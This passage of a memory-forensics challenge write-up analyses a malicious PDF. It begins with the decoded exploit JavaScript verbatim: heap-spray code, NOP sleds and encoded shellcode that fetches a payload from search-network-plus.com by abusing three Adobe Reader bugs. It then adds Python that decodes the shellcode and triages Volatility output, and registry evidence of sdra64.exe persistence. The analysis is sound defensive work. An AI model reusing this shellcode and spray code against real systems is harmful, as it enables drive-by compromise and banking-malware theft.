XrS=0x30303030;HRb=sly("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u732F\u6165\u6372\u2D68\u656E\u7774\u726F\u2D6B\u6C70\u7375\u632E\u6D6F\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3620\u302E\u6526\u313D\u0000\u0000%23%26%23%26%23%26%23%26%23%26%23%26%23%26%23%26%23%26%23%26");var jxU=4194304;var RaR=HRb.length*2;var dqO=jxU-(RaR+0x38);var BtM=sly("\u9090\u9090");BtM=ppu(BtM,dqO);var JYD=(XrS-4194304)/jxU;for(var Prn=0;Prn<JYD;Prn++){dwl[Prn]=BtM+HRb;}
var IdI="66055447950636260127";for(sly=0;sly<138*2;sly++){IdI+="3";}
util.printf("%45000f",IdI);}
function ynu(shG)
{shG=shG.replace(/[\+1]/g,"0");shG=shG.replace(/[\+2]/g,"9");shG=shG.replace(/[\+3]/g,"8");shG=shG.replace(/[\+4]/g,"7");shG=shG.replace(/[\+5]/g,"6");shG=shG.replace(/[\+6]/g,"5");shG=shG.replace(/[\+7]/g,"4");shG=shG.replace(/[\+8]/g,"3");shG=shG.replace(/[\+9]/g,"2");shG=shG.replace(/[\+0]/g,"1");return shG;}
function XiIHG(){var cqcNr=sly("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u732F\u6165\u6372\u2D68\u656E\u7774\u726F\u2D6B\u6C70\u7375\u632E\u6D6F\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3620\u302E\u6526\u333D\u0000\u1334\u1334");dPl=sly("\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090")+cqcNr;FQI=sly("\u9090\u9090");fhT=5*2;sLa=fhT+dPl.length;while(FQI.length<sLa)FQI+=FQI;NJn=FQI.substring(0,sLa);eUq=FQI.substring(0,FQI.length-sLa);while(eUq.length+sLa<0x40000)eUq=eUq+eUq+NJn;Cwy=[];for(XWT=0;XWT<180;XWT++)Cwy[XWT]=eUq+dPl;var kKG=4012;var LwZ=Array(kKG);for(XWT=0;XWT<kKG;XWT++)
{LwZ[XWT]=sly("\u000a\u000a\u000a\u000a");}
Collab.getIcon(LwZ+"_N.bundle");}
var sly=unescape,ZgA=app.viewerVersion.toString(),TjP=this;if(ZgA<8)
{bSuTN();}
if(ZgA>=8&&ZgA<9)
{Soy();}
if(ZgA<=9)
{XiIHG();}
The script branches on app.viewerVersion (sly is just unescape):
If the Adobe Reader version is below 8, bSuTN() is used: Collab.collectEmailInfo / CVE-2007-5659.
If the version is 8 or above but below 9, Soy() is used: util.printf / CVE-2008-2992.
If the version is 9 or below, XiIHG() is used: Collab.getIcon / CVE-2009-0927.
The third condition (ZgA<=9) is not exclusive, so on any Reader older than 9 XiIHG() runs as well, after whichever of the first two matched. All three functions follow the same pattern: spray the heap with blocks consisting of a NOP sled (\u9090) followed by the shellcode, then trigger the bug with an oversized argument so that control lands in the sprayed region. bSuTN() allocates 4 MB blocks (HsVTm) until it reaches HWXsi = 202116108 = 0x0C0C0C0C and passes a long string of \u0c0c to Collab.collectEmailInfo; Soy() sprays up to XrS = 0x30303030 and calls util.printf("%45000f", ...) on a 296-digit number; XiIHG() builds 180 blocks and calls Collab.getIcon with a 4012-element array of \u000a strings joined into the icon name.
The URL that the shellcode finally connects to is embedded in the \uXXXX string itself (two ASCII bytes per code unit, low byte first: \u7468 is "ht"). The three copies are identical except for the last query parameter, \u6526\u323D ("&e=2") in bSuTN(), \u6526\u313D ("&e=1") in Soy() and \u6526\u333D ("&e=3") in XiIHG(), presumably so that the server knows which exploit succeeded:
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=x (x = 2, 1 or 3 respectively)
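To make the layers of this sample concrete, here is an added Python example (not from the original post, the exploit, or any of the tools above) that decodes the #xx-escaped filter names of object 1054, unpacks the \uXXXX shellcode string into the bytes it occupies in memory and pulls out the embedded URL, and reproduces the heap-spray arithmetic of bSuTN() to check that 0x0C0C0C0C lands inside a NOP sled. The shellcode is abbreviated to the tail copied from the decoded script, its total length is an assumed value, and the meaning given to the 0x38 constant is inferred rather than stated in the script.

```python
import math
import re

# ---- 1. PDF name escapes --------------------------------------------------
# PDF lets any byte of a name be written as #xx, so /F#6c#61#74e#44e#63#6fde
# is a perfectly valid spelling of /FlateDecode that a grep will not find.
NAME_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")
NAME_TOKEN = re.compile(rb"/([^\s/<>\[\]()]+)")

STREAM_DICT = (b"<</Length 0000/Filter [/F#6c#61#74e#44e#63#6fde"
               b"/#41#53#43II#38#35#44#65#63#6fd#65]>>")  # copied from the output above


def decode_pdf_name(name):
    """Replace every #xx escape with the byte it stands for."""
    return NAME_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), name)


def filters_of(dict_bytes):
    """Decoded filter chain of a stream dictionary, in application order."""
    m = re.search(rb"/Filter\s*(\[[^\]]*\]|/[^\s/<>\[\]()]+)", dict_bytes)
    if not m:
        return []
    return [decode_pdf_name(n).decode("latin-1") for n in NAME_TOKEN.findall(m.group(1))]


# ---- 2. The \uXXXX shellcode string ---------------------------------------
# unescape() turns each \uXXXX into one UTF-16 code unit, stored low byte
# first in memory, so \u7468 is the two ASCII bytes "ht". The tail of the
# bSuTN() string (copied from the decoded script) is enough to show the URL.
SHELLCODE_TAIL = (r"\u7468\u7074\u2F3A\u732F\u6165\u6372\u2D68\u656E\u7774\u726F"
                  r"\u2D6B\u6C70\u7375\u632E\u6D6F\u6C2F\u616F\u2E64\u6870\u3F70"
                  r"\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70"
                  r"\u726F\u7265\u3620\u302E\u6526\u323D\u0000%25%30%25%30")
JS_ESCAPE = re.compile(r"\\u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})|(.)", re.S)
URL_RE = re.compile(rb"https?://[\x20-\x7e]+?\x00")  # NUL-terminated, spaces allowed


def js_string_bytes(s):
    """Bytes that a JavaScript string built with unescape(s) occupies in memory."""
    units = []
    for m in JS_ESCAPE.finditer(s):
        if m.group(1):
            units.append(int(m.group(1), 16))
        elif m.group(2):
            units.append(int(m.group(2), 16))
        else:
            units.append(ord(m.group(3)))
    return b"".join(u.to_bytes(2, "little") for u in units)


def embedded_urls(blob):
    """Every NUL-terminated URL found in a shellcode blob."""
    return [m.group(0).rstrip(b"\x00").decode("ascii") for m in URL_RE.finditer(blob)]


# ---- 3. Heap spray geometry of bSuTN() ------------------------------------
# HsVTm = 4194304 serves both as the block size and, via HWXsi-4194304, as the
# assumed start of the sprayed heap. Each block is a NOP sled of
# HsVTm-(shellcode+0x38) bytes followed by the shellcode; the 0x38 is assumed
# here to be the allowance for the string object's own header.
SPRAY_TARGET = 202116108        # HWXsi == 0x0C0C0C0C
SPRAY_BLOCK = 4194304           # HsVTm
SHELLCODE_LEN = 0x200           # assumed; the real value is Uueqk.length*2


def spray_plan(target, block, shellcode_len, overhead=0x38, base=None):
    """(blocks allocated, sled bytes per block, target's offset in its block,
    whether that offset falls in the sled rather than in the shellcode)."""
    base = block if base is None else base
    sled = block - (shellcode_len + overhead)
    blocks = math.ceil((target - base) / block)   # iterations of the for-loop
    offset = (target - base) % block
    return blocks, sled, offset, offset < sled


if __name__ == "__main__":
    print(filters_of(STREAM_DICT))
    print(embedded_urls(js_string_bytes(SHELLCODE_TAIL)))
    print(spray_plan(SPRAY_TARGET, SPRAY_BLOCK, SHELLCODE_LEN))
    print(spray_plan(0x30303030, SPRAY_BLOCK, SHELLCODE_LEN))  # Soy()'s XrS
```

With the page's constants bSuTN() allocates 48 blocks and 0x0C0C0C0C falls 0xC0C0C bytes into the 48th, deep inside the NOP sled; Soy() needs 192 blocks for 0x30303030. That arithmetic is also why the tail of the shellcode string is where to look for the callback URL: the sled is in front of it, not behind it.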
7. List suspicious files that were loaded by any processes on the victim’s machine. From this information, what was a possible payload of the initial exploit be that would be affecting the victim’s bank account? (2pts)
Searching the output file saved in step 3 for the URL that the exploit code above accesses gives the following.
D:\Security Tools\Forensic\Volatility-1.3_Beta>grep search-network output.txt
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
http://search-network-plus.com/cache/PDF.php?st=Internet%20Explorer%206.0
http://search-network-plus.com/favicon.ico
http://search-network-plus.com/cache/PDF.php?st=Internet%20Explorer%206.0
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=1
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
[... rest omitted]
And listing the files opened by the process with PID 1752 gives the following.
D:\Security Tools\Forensic\Volatility-1.3_Beta>c:\Python27\python.exe volatility files -p 1752 -f Bob.vmem
Pid: 1752
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9
File \lsarpc
File \DOCUME~1\ADMINI~1\LOCALS~1\Temp\Acr107.tmp
File \DOCUME~1\ADMINI~1\LOCALS~1\Temp\Acr106.tmp
File \Program Files\Adobe\Acrobat 6.0\Resource\Font
File \Program Files\Adobe\Acrobat 6.0\Resource\CMap
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9
File \DOCUME~1\ADMINI~1\LOCALS~1\Temp\Acr10C.tmp
File \DOCUME~1\ADMINI~1\LOCALS~1\Temp\plugtmp\PDF.php
File \Program Files\Adobe\Acrobat 6.0\Reader\Messages\ENU\RdrMsgENU.pdf
File \DOCUME~1\ADMINI~1\LOCALS~1\Temp\Acr110.tmp
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9
File \Documents and Settings\Administrator\Application Data\AdobeUM
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9
File \Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
File \Documents and Settings\Administrator\Cookies\index.dat
File \Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
File \Endpoint
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9
File \ROUTER
File \ROUTER
File \Endpoint
File \AsyncConnectHlp
In the list above, a file at the path DOCUME~1\ADMINI~1\LOCALS~1\Temp\plugtmp\PDF.php can be seen.
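The two steps above (grepping the strings output for the exploit-kit URLs, then reading the per-process file list for anything dropped in a temp folder) are easy to do by hand once, but a small script makes the triage repeatable across processes. The following is an added example, not code from the write-up or from Volatility: it parses the text format of the Volatility 1.3 `files -p <pid>` listing and a strings-style URL dump, decodes `%20` escapes so the two spellings of the PDF.php URL collapse into one count, and flags temp-directory files with an interpreted or executable extension. The sample inputs are constructed to mirror the output shown above; the extension list and temp-path markers are my own heuristics.

```python
"""Triage helpers for Volatility 1.3 text output (added example, not part of
the original write-up). Sample inputs are constructed after the listings
shown in the write-up."""
from collections import Counter
from urllib.parse import unquote, urlsplit

# Constructed excerpt of a strings-style dump containing URLs (one per line).
SAMPLE_STRINGS = """\
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
http://search-network-plus.com/cache/PDF.php?st=Internet%20Explorer%206.0
http://search-network-plus.com/favicon.ico
http://search-network-plus.com/cache/PDF.php?st=Internet%20Explorer%206.0
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=1
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
some unrelated string
http://www.example.com/index.html
"""

# Constructed excerpt of `volatility files -p 1752` output (raw string: backslashes are literal).
SAMPLE_FILES = r"""
Pid: 1752
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9
File \DOCUME~1\ADMINI~1\LOCALS~1\Temp\Acr107.tmp
File \Program Files\Adobe\Acrobat 6.0\Resource\Font
File \DOCUME~1\ADMINI~1\LOCALS~1\Temp\plugtmp\PDF.php
File \Program Files\Adobe\Acrobat 6.0\Reader\Messages\ENU\RdrMsgENU.pdf
File \Endpoint
"""


def extract_urls(text):
    """Return every line that is an http(s) URL, with %-escapes decoded so
    'Internet%20Explorer' and 'Internet Explorer' become the same string."""
    urls = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith(("http://", "https://")):
            urls.append(unquote(line))
    return urls


def summarize_by_host(urls, host):
    """Count distinct path+query combinations seen for one host."""
    counts = Counter()
    for url in urls:
        parts = urlsplit(url)
        if parts.hostname == host:
            key = parts.path + ("?" + parts.query if parts.query else "")
            counts[key] += 1
    return counts


def parse_files_output(text):
    """Return (pid, [paths]) from the text of `volatility files -p <pid>`."""
    pid, paths = None, []
    for line in text.splitlines():
        if line.startswith("Pid:"):
            pid = int(line.split(":", 1)[1])
        elif line.startswith("File "):
            paths.append(line[5:].strip())
    return pid, paths


# Heuristic markers for user-writable temp locations (assumption, not from Volatility).
TEMP_MARKERS = ("\\temp\\", "\\tmp\\", "\\temporary internet files\\")


def flag_temp_files(paths, interesting_ext=(".php", ".exe", ".dll", ".pdf", ".js")):
    """Flag paths under a temp directory that carry an interpreted or
    executable extension; plugtmp\\PDF.php is the case from the write-up."""
    flagged = []
    for path in paths:
        low = path.lower()
        if any(marker in low for marker in TEMP_MARKERS) and low.endswith(interesting_ext):
            flagged.append(path)
    return flagged


if __name__ == "__main__":
    for key, n in summarize_by_host(extract_urls(SAMPLE_STRINGS), "search-network-plus.com").most_common():
        print(f"{n:3d}  {key}")
    pid, paths = parse_files_output(SAMPLE_FILES)
    print(f"PID {pid}: {len(paths)} handles, suspicious: {flag_temp_files(paths)}")
```

Pointing the two parsers at the real `output` file and at the saved `files -p` listings for every PID from `pslist` turns question 7 into a loop rather than a manual grep per process.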
8. If any suspicious files can be extracted from an injected process, do any anti-virus products pick up the suspicious executable? What is the general result from anti-virus products? (6pts)
Is it possible to extract the file? Hmm.
9. Are there any related registry entries associated with the payload? (4pts)
The registry can be handled with a Volatility plugin. Download the Memory Registry Tools from the link below.
http://moyix.blogspot.com/2009/01/memory-registry-tools.html
D:\Security Tools\Forensic\Volatility>c:\Python27\python.exe volatility hivescan -f Bob.vmem
Offset (hex)
44658696 0x2a97008
44686176 0x2a9db60
48529416 0x2e48008
55269896 0x34b5a08
57399112 0x36bd748
59082008 0x3858518
70588752 0x4351950
111029088 0x69e2b60
114539360 0x6d3bb60
121604960 0x73f8b60
180321120 0xabf7b60
191408992 0xb68ab60
244959264 0xe99c820
D:\Security Tools\Forensic\Volatility>c:\Python27\python.exe volatility hivelist -f Bob.vmem -o 0x2a97008
Address Name
0xe1d6cb60 \Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1de0b60 \Documents and Settings\Administrator\NTUSER.DAT
0xe1769b60 \Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe17deb60 \Documents and Settings\LocalService\NTUSER.DAT
0xe1797b60 \Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe17a3820 \Documents and Settings\NetworkService\NTUSER.DAT
0xe1526748 \WINDOWS\system32\config\software
0xe15a3950 \WINDOWS\system32\config\default
0xe151ea08 \WINDOWS\system32\config\SAM
0xe153e518 \WINDOWS\system32\config\SECURITY
0xe139d008 [no name]
0xe1035b60 \WINDOWS\system32\config\system
0xe102e008 [no name]
D:\Security Tools\Forensic\Volatility>c:\Python27\python.exe volatility printkey -f Bob.vmem -o 0xe1526748 "Microsoft\Windows NT\CurrentVersion\Winlogon"
Key name: Winlogon (Stable)
Last updated: Sun Feb 28 05:12:34 2010
Subkeys:
GPExtensions (Stable)
Notify (Stable)
SpecialAccounts (Stable)
Credentials (Volatile)
Values:
REG_DWORD AutoRestartShell : 1 (Stable)
REG_SZ DefaultDomainName : BOB-DCADFEDC55C (Stable)
REG_SZ DefaultUserName : Administrator (Stable)
REG_SZ LegalNoticeCaption : (Stable)
REG_SZ LegalNoticeText : (Stable)
REG_SZ PowerdownAfterShutdown : 0 (Stable)
REG_SZ ReportBootOk : 1 (Stable)
REG_SZ Shell : Explorer.exe (Stable)
REG_SZ ShutdownWithoutLogon : 0 (Stable)
REG_SZ System : (Stable)
REG_SZ Userinit : C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\sdra64.exe, (Stable)
REG_SZ VmApplet : rundll32 shell32,Control_RunDLL "sysdm.cpl" (Stable)
REG_DWORD SfcQuota : 4294967295 (Stable)
REG_SZ allocatecdroms : 0 (Stable)
REG_SZ allocatedasd : 0 (Stable)
REG_SZ allocatefloppies : 0 (Stable)
REG_SZ cachedlogonscount : 10 (Stable)
REG_DWORD forceunlocklogon : 0 (Stable)
REG_DWORD passwordexpirywarning : 14 (Stable)
REG_SZ scremoveoption : 0 (Stable)
REG_DWORD AllowMultipleTSSessions : 1 (Stable)
REG_EXPAND_SZ UIHost : logonui.exe (Stable)
REG_DWORD LogonType : 1 (Stable)
REG_SZ Background : 0 0 0 (Stable)
REG_SZ AutoAdminLogon : 0 (Stable)
REG_SZ DebugServerCommand : no (Stable)
REG_DWORD SFCDisable : 0 (Stable)
REG_SZ WinStationsDisabled : 0 (Stable)
REG_DWORD HibernationPreviouslyEnabled : 1 (Stable)
REG_DWORD ShowLogonOptions : 0 (Stable)
REG_SZ AltDefaultUserName : Administrator (Stable)
REG_SZ AltDefaultDomainName : BOB-DCADFEDC55C (Stable)
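The line that answers question 9 is the Userinit value: a clean Windows XP box has only `C:\WINDOWS\system32\userinit.exe,` there, and the extra `sdra64.exe` entry is what makes the payload start at every logon. Since this is easy to overlook in a wall of REG_SZ lines, here is an added example (my code, not from the write-up or from the Memory Registry Tools) that parses the `printkey` text format above and reports any entry in Shell or Userinit that is not the expected default. The sample text is constructed after the output shown; the list of expected defaults is an assumption for XP and should be adjusted for other Windows versions.

```python
"""Check a Volatility `printkey` dump of the Winlogon key for logon
persistence (added example, not part of the original write-up)."""
import re

# Constructed excerpt of `volatility printkey ... "Microsoft\Windows NT\CurrentVersion\Winlogon"`.
SAMPLE_PRINTKEY = r"""
Key name: Winlogon (Stable)
Last updated: Sun Feb 28 05:12:34 2010
Subkeys:
  Notify (Stable)
Values:
REG_SZ Shell : Explorer.exe (Stable)
REG_SZ Userinit : C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\sdra64.exe, (Stable)
REG_SZ System : (Stable)
REG_SZ VmApplet : rundll32 shell32,Control_RunDLL "sysdm.cpl" (Stable)
REG_EXPAND_SZ UIHost : logonui.exe (Stable)
"""

# One value line: "<type> <name> : <data> (Stable|Volatile)"; data may be empty.
VALUE_RE = re.compile(r"^(REG_\w+)\s+(\S+)\s+:\s*(.*?)\s*\((Stable|Volatile)\)\s*$")

# Expected defaults on Windows XP (assumption; both bare and full-path spellings accepted).
EXPECTED = {
    "Shell": ["explorer.exe", r"c:\windows\explorer.exe"],
    "Userinit": ["userinit.exe", r"c:\windows\system32\userinit.exe"],
}


def parse_printkey_values(text):
    """Return {name: (reg_type, data)} for every line in the Values: section."""
    values, in_values = {}, False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("Values:"):
            in_values = True
            continue
        if not in_values:
            continue
        match = VALUE_RE.match(line)
        if match:
            values[match.group(2)] = (match.group(1), match.group(3))
    return values


def split_list_value(data):
    """Winlogon stores comma-separated command lists with a trailing comma."""
    return [part.strip().lower() for part in data.split(",") if part.strip()]


def check_winlogon(values):
    """Return [(value_name, [unexpected entries])] for Shell and Userinit."""
    findings = []
    for name, allowed in EXPECTED.items():
        if name not in values:
            continue
        extra = [e for e in split_list_value(values[name][1]) if e not in allowed]
        if extra:
            findings.append((name, extra))
    return findings


if __name__ == "__main__":
    vals = parse_printkey_values(SAMPLE_PRINTKEY)
    for name, extra in check_winlogon(vals):
        print(f"{name}: unexpected entries {extra}")
```

The same check applies to the per-user hives listed by `hivelist`: Winlogon under HKLM\Software is the system-wide one shown above, but an attacker can also use Run keys in NTUSER.DAT, so the hive offset passed to `printkey` should be varied accordingly.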